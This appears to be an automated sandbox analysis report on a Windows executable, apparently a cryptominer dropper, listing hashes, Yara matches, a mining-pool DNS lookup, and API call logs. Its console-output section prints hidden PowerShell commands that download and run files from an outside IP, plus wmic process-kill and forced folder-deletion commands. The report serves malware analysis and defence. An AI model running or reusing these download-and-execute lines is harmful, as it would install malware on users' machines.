Summary | ZeroBOX

kch.com

Gen1 Antivirus
Category: FILE
Machine: s1_win7_x6401
Started: April 12, 2021, 10:39 a.m.
Completed: April 12, 2021, 10:41 a.m.
Size 294.7KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 712696c784185d9eaa3c7dccf54a5f68
SHA256 372cb63d7b42b6d3963097f324ef997e0f30e56a9ed3c2edd506de3a236cd74d
CRC32 3E557F0B
ssdeep 6144:m/fAhvV6B8ErzPZp5wdz753RSriX+tGrUHBQ:mfAv6B8azBwdmiX+tGAHBQ
PDB Path D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb
Yara
  • escalate_priv - Escalate privileges
  • screenshot - Take screenshot
  • win_registry - Affect system registries
  • win_token - Affect system token
  • win_files_operation - Affect private profile
  • PE_Header_Zero - PE File Signature Zero
  • OS_Processor_Check_Zero - OS Processor Check Signature Zero
  • IsPE32 - (no description)
  • IsWindowsGUI - (no description)
  • HasOverlay - Overlay Check
  • HasDebugData - DebugData Check
  • HasRichSignature - Rich Signature Check

DNS lookups (Name / Response / Post-Analysis Lookup)
pool.hashvault.pro 131.153.76.130 -

Contacted hosts (IP Address / Status / Action)
131.153.76.130 Active Moloch
164.124.101.2 Active Moloch
34.126.93.163 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\updateW>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: wmic
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\updateW>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: RD
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: /S /Q "C:\Windows (x86)"
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: The system cannot find the file specified.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\updateW>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: ping
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 127.0.0.1 -n 5
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: nul
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\updateW>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: PowerShell
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://34.126.93.163/xm/win.com','C:\Users\test22\AppData\Local\Temp\updateW\win.com');Start-Process 'C:\Users\test22\AppData\Local\Temp\updateW\win.com'
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\updateW>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: PowerShell
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://34.126.93.163/xm/64a1.com','C:\Users\test22\AppData\Local\Temp\updateW\64a1.com');Start-Process 'C:\Users\test22\AppData\Local\Temp\updateW\64a1.com'
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\updateW>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: ping
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 127.0.0.1 -n 10
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: nul
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\updateW>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: RD
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: /S /Q "C:\Users\test22\AppData\Local\Temp\updateW\"
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: The process cannot access the file because it is being used by another process.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: The batch file cannot be found.
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: No Instance(s) Available.
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002efc20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f01a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f01a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f01a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002efd20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002efd20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002efd20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002efd20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002efd20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002efd20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ef7e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ef7e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ef7e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f01a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f01a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f01a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f00a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f01a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f01a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f01a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f01a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f01a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f01a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f01a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ef920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ef920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ef920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ef920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ef920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ef920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ef920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ef920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ef920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ef920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ef920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ef920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ef920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ef920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f05a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f05a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029d028
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029da28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029da28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029da28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029d0e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029d0e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029d0e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029d0e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029d0e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029d0e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
pdb_path D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
section .gfids
resource name PNG
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x74b24387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x74d4ef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x74d46b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x74d65c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x74de06b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x74bfd7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x74bfd876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x74bfddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x74b18a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x74b18938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x74b1950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x74bfdccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x74bfdb41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x74bfe1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x74b19367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x74b19326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755b77c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755b788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x74ada48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x74ad853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x74ada4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x74aecd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x74aed87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x76a7b727
registers.esp: 5631328
registers.edi: 6681836
registers.eax: 5631328
registers.ebp: 5631408
registers.edx: 53
registers.ebx: 5631692
registers.esi: 2147746133
registers.ecx: 6449304
1 0 0

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x74acfe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x74bfa338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x74f8e99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x74f672ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x74f5ab0d
IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x74f8c048
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x74f587f7
RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x74f58926
RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x74f5d55e
IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x74f8c44b
RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x74f5d1f6
RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x74f5d1ac
RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x74f5d40b
RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x74f5991b
RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x74f58d67
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x74f5a0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x74f59b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x74f59aa8
DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x72ce6f4f
DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x72ce6e40
DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x72ce27a4
DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x72ce2652
DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x72ce253d
DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x72ce2411
DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x72ce25ab
wmic+0x39c80 @ 0x389c80
wmic+0x3b06a @ 0x38b06a
wmic+0x3b1f8 @ 0x38b1f8
wmic+0x36fcd @ 0x386fcd
wmic+0x3d6e9 @ 0x38d6e9
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x76a7b727
registers.esp: 2812496
registers.edi: 1957755408
registers.eax: 2812496
registers.ebp: 2812576
registers.edx: 1
registers.ebx: 6418964
registers.esi: 2147746133
registers.ecx: 3811565449
1 0 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://34.126.93.163/xm/win.com
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://34.126.93.163/xm/64a1.com
request GET http://34.126.93.163/xm/win.com
request GET http://34.126.93.163/xm/64a1.com
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x728c2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1160
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73cb2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2672
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73fd1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 851968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02870000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02900000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 260
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72311000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0270a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 260
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72312000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02702000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02712000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02901000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02902000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0273a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02713000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02714000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0274b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02747000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0270b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02732000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02745000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02715000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0273c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a90000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02716000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0274c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02733000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02734000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02735000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02736000
